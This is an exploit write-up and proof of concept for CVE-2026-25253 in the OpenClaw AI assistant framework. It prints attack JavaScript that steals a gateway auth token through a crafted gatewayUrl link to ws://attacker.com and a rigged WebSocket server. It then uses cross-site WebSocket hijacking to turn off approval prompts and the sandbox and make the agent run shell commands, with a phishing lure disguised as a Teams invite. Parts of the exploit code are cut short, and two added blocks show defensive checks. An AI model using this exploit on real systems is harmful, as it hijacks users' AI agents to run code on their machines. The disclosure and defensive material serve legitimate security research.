## https://sploitus.com/exploit?id=84AE8E47-F316-5E2E-8386-DFF0AE27F49E
# CVE-2026-25253: One-Click RCE in OpenClaw via Auth Token Theft
**Affected Software:** OpenClaw (clawbot)

**LEGAL DISCLAIMER:** This code and writeup are provided for authorized security research and educational purposes only. Use of this exploit against systems without explicit written permission is illegal and unethical. The author assumes no liability for misuse.
---
## Technical Background
OpenClaw, previously known as **Clawdbot** and referred to as **Moltbot** in early versions, is an AI assistant framework that runs locally on macOS, Windows, or Linux. It supports cloud-based models such as Anthropic and OpenAI, as well as local models.
The **Control UI** is a single-page application, served at `/chat`. It communicates with the local gateway server over WebSocket at `ws://127.0.0.1:18789/` (or `wss://host:18789/` for TLS).
Key security characteristics of the affected versions:
- Authentication tokens and passwords are stored in **`localStorage`**
- Device identity is established via **Ed25519 key pairs** (`noble-ed25519`)
- The WebSocket protocol uses JSON-RPC style messages (`type: "req"`, `"res"`, `"event"`)
- On connect, the Control UI sends authentication credentials and device identity in the first `connect` frame
---
## Root Cause: `applySettingsFromUrl()`
The vulnerability lives in [`applySettingsFromUrl()`](https://github.com/openclaw/openclaw/blob/bcedeb4e1f620a50b6e99f1e2b25cc692f0d7bab/ui/src/ui/app-settings.ts#L59) in the Control UI.
When the Control UI is loaded, this function reads the `?gatewayUrl=` query parameter from the URL and **stores it as the active gateway endpoint**, with no validation of whether it points to a trusted host.
An attacker can craft a link such as:
```
http:///chat?gatewayUrl=ws://attacker.com
```
When the victim clicks this link while authenticated in OpenClaw, the following happens automatically:
1. `applySettingsFromUrl()` stores `ws://attacker.com` as the new gateway URL
2. The Control UI opens a WebSocket connection to the attacker's server
3. The Control UI sends its `connect` frame, including the **authentication token**, device ID, and Ed25519 public key, to the attacker
4. The attacker captures the token and replays it against the legitimate gateway at `ws://127.0.0.1:18789`
5. The attacker now has an authenticated operator session on the victim's machine
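
A defensive counterpart to the flaw described above, as an added example that is not OpenClaw's code or its actual patch: check a `gatewayUrl` taken from the query string before it is stored. The function names and the policy (`ws`/`wss` only, same host as the page or loopback-to-loopback) are assumptions.

```javascript
// Added example: hypothetical helpers, not OpenClaw's code or its patch.
const LOOPBACK = new Set(['127.0.0.1', 'localhost', '[::1]']);

// Decide whether a gatewayUrl from the query string may replace the stored one.
// pageUrl is the URL the Control UI itself was loaded from.
function checkGatewayUrl(candidate, pageUrl) {
  let gw, page;
  try {
    gw = new URL(candidate);
    page = new URL(pageUrl);
  } catch {
    return { ok: false, reason: 'unparseable' };
  }
  if (gw.protocol !== 'ws:' && gw.protocol !== 'wss:') {
    return { ok: false, reason: 'scheme' };
  }
  // ws://127.0.0.1@evil.example parses with hostname evil.example
  if (gw.username || gw.password) return { ok: false, reason: 'userinfo' };
  // A UI served over TLS must not fall back to cleartext ws://
  if (page.protocol === 'https:' && gw.protocol !== 'wss:') {
    return { ok: false, reason: 'downgrade' };
  }
  // Compare parsed hosts, never substrings of the raw string
  if (gw.host === page.host) return { ok: true, reason: 'same-host' };
  if (LOOPBACK.has(gw.hostname) && LOOPBACK.has(page.hostname)) {
    return { ok: true, reason: 'loopback' };
  }
  return { ok: false, reason: 'foreign-host' };
}

// Returns the gateway to use: the requested one only if it passes the check,
// otherwise the previously stored value is kept and the reason is reported.
function resolveGateway(pageUrl, storedGateway) {
  const requested = new URL(pageUrl).searchParams.get('gatewayUrl');
  if (requested === null) return { gateway: storedGateway, rejected: null };
  const verdict = checkGatewayUrl(requested, pageUrl);
  return verdict.ok
    ? { gateway: requested, rejected: null }
    : { gateway: storedGateway, rejected: verdict.reason };
}

// Constructed input: the link shape from this section, with a placeholder host.
const samplePage = 'http://127.0.0.1:18789/chat?gatewayUrl=' +
  encodeURIComponent('ws://attacker.example');
console.log(resolveGateway(samplePage, 'ws://127.0.0.1:18789'));
```

Validation narrows where the credential-bearing `connect` frame can be sent; it does not make the settings token in `localStorage` any less replayable once disclosed.
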
---
## Exploitation
### Step 1: Token Theft via the Popup Trick
In this PoC, the attacker hosts a page (`meeting.html`) that opens the victim's own Control UI in a popup, injected with the malicious `?gatewayUrl=` parameter:
```javascript
const attackerGatewayUrl = `ws://:8080`;
const targetUrl = `http://127.0.0.1:18789?gatewayUrl=${encodeURIComponent(attackerGatewayUrl)}`;
window.open(targetUrl, '_blank');
```
The attacker server exploits OpenClaw's two-token fallback: the first `connect` attempt uses the **device token** (Ed25519-bound, not replayable). By rejecting it, the server forces the Control UI to retry with the **settings token**, a long-lived bearer token that *is* replayable:
```javascript
// Reject attempt #1: forces Control UI to retry with settings token
if (connectAttempts === 1) {
  ws.send({ type: 'res', ok: false, error: { code: 'AUTH_FAILED' } });
  return;
}
// Attempt #2: settings token captured
capturedToken = token;
```
### Step 2 โ Cross-Site WebSocket Hijacking
With the stolen settings token, `meeting.html` opens its **own** direct WebSocket connection to the real gateway (`ws://127.0.0.1:18789`). This is possible because the gateway in versions …
```javascript
// …
  …',
  agentId: 'main',
  sessionKey: 'agent:main:main',
  deliver: false,
});
```
---
## Full Attack Flow
```mermaid
sequenceDiagram
    autonumber
    actor Attacker
    participant Browser as Victim Browser<br/>(meeting.html)
    participant CtrlUI as OpenClaw Control UI<br/>(popup @ 127.0.0.1:18789/chat)
    participant AtkWS as Attacker WS Server<br/>(:8080)
    participant GW as Real OpenClaw Gateway<br/>(127.0.0.1:18789)
    participant LLM as Cloud LLM<br/>(OpenAI / Anthropic)
    Attacker->>Browser: Phishing link opens meeting.html<br/>(disguised as a Teams invite)
    Note over Browser: Phase 1 - Token Theft
    Browser->>CtrlUI: Opens popup with ?gatewayUrl=ws://attacker:8080
    Note over CtrlUI: applySettingsFromUrl() stores<br/>attacker WS as active gateway
    CtrlUI->>AtkWS: connect { auth.token: DEVICE_TOKEN }
    AtkWS-->>CtrlUI: AUTH_FAILED (reject, forces retry)
    CtrlUI->>AtkWS: connect { auth.token: SETTINGS_TOKEN }
    AtkWS-->>CtrlUI: hello-ok (fake response)
    AtkWS->>Browser: token_captured { token: SETTINGS_TOKEN }
    Note over Browser: Phase 2 - Gateway Hijack (CSWSH)
    Browser->>GW: WebSocket connect (no Origin validation)<br/>auth { token: SETTINGS_TOKEN }
    GW-->>Browser: Authenticated as operator
    Note over Browser: Phase 3 - Security Bypass
    Browser->>GW: exec.approvals.set { ask: "off" }
    GW-->>Browser: Approval prompts disabled
    Browser->>GW: config.patch { exec.host: "gateway",<br/>sandbox.mode: "off" }
    GW-->>Browser: Sandbox disabled, exec on host
    Note over Browser: Phase 4 - Remote Code Execution
    Browser->>GW: agent { message: "Execute shell command: touch /tmp/success" }
    GW->>LLM: Forward prompt (security already stripped)
    LLM-->>GW: Tool call: exec("touch /tmp/success")
    GW->>GW: Runs command on HOST filesystem
    GW-->>Browser: Command executed
```
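Phase 2 of the flow succeeds because the gateway accepts a WebSocket handshake from any page ("no Origin validation"). An Origin allowlist check applied at upgrade time, as an added example that is not OpenClaw's code; the function names and the allowlist values are assumptions.

```javascript
// Added example: hypothetical names; the allowlist values are constructed
// from the Control UI address used on this page.
const ALLOWED_ORIGINS = new Set([
  'http://127.0.0.1:18789',
  'http://localhost:18789',
]);

// Reduce an Origin header to scheme://host[:port], or null if it is opaque
// ("null" from sandboxed frames and file:// pages) or malformed.
function parseOrigin(value) {
  if (typeof value !== 'string') return null;
  try {
    const origin = new URL(value).origin;
    return origin === 'null' ? null : origin;
  } catch {
    return null;
  }
}

// Gate for the WebSocket upgrade, run before any auth frame is read.
// `headers` uses lower-case names, as Node's http module provides them.
function verifyUpgrade(headers, allowed = ALLOWED_ORIGINS) {
  const raw = headers.origin;
  // Browsers always send Origin on a WebSocket handshake; its absence means
  // a non-browser client, which still has to present a valid token.
  if (raw === undefined) return { accept: true, reason: 'no-origin' };
  const origin = parseOrigin(raw);
  if (origin === null) return { accept: false, reason: 'opaque-or-invalid' };
  return allowed.has(origin)
    ? { accept: true, reason: 'allowlisted' }
    : { accept: false, reason: 'cross-site' };
}

// Constructed handshakes: the UI itself, a page like meeting.html on another
// origin, a sandboxed frame, a look-alike host that defeats prefix checks,
// and a client that sends no Origin at all.
const SAMPLES = [
  { origin: 'http://127.0.0.1:18789' },
  { origin: 'http://attacker.example:3000' },
  { origin: 'null' },
  { origin: 'http://127.0.0.1.attacker.example:18789' },
  {},
];
const verdicts = () => SAMPLES.map((h) => verifyUpgrade(h).reason);
console.log(verdicts());
```

In Node this check belongs in the HTTP server's `upgrade` handler, so a rejected handshake is closed before the first `connect` frame is parsed.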
---
## Running the PoC
### Setup
```bash
npm install # installs 'ws' dependency
```
### Configure `meeting.html`
```javascript
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // victim's local gateway
const ATTACKER_WS_PORT = 8080; // must match attacker-server.js
const COMMAND = 'touch /tmp/success';
```
### Run
```bash
node attacker-server.js
```
Send the victim:
```
http://:3000/meeting.html
```
---
## References
| Resource | Link |
|---|---|
| Vendor Advisory | [GHSA-g8p2-7wf7-98mq](https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq) |
| SonicWall Analysis | [sonicwall.com/blog/...](https://www.sonicwall.com/blog/openclaw-auth-token-theft-leading-to-rce-cve-2026-25253) |
| Ethiack Blog | [ethiack.com/news/blog/one-click-rce-openclaw](https://ethiack.com/news/blog/one-click-rce-openclaw) |
| Hackers-Arise | [CVE-2026-25253 writeup](https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/) |
| Original PoC | [github.com/ethiack/moltbot-1click-rce](https://github.com/ethiack/moltbot-1click-rce) |
| SonicWall IPS | 21908 OpenClaw Sensitive Data Exposure |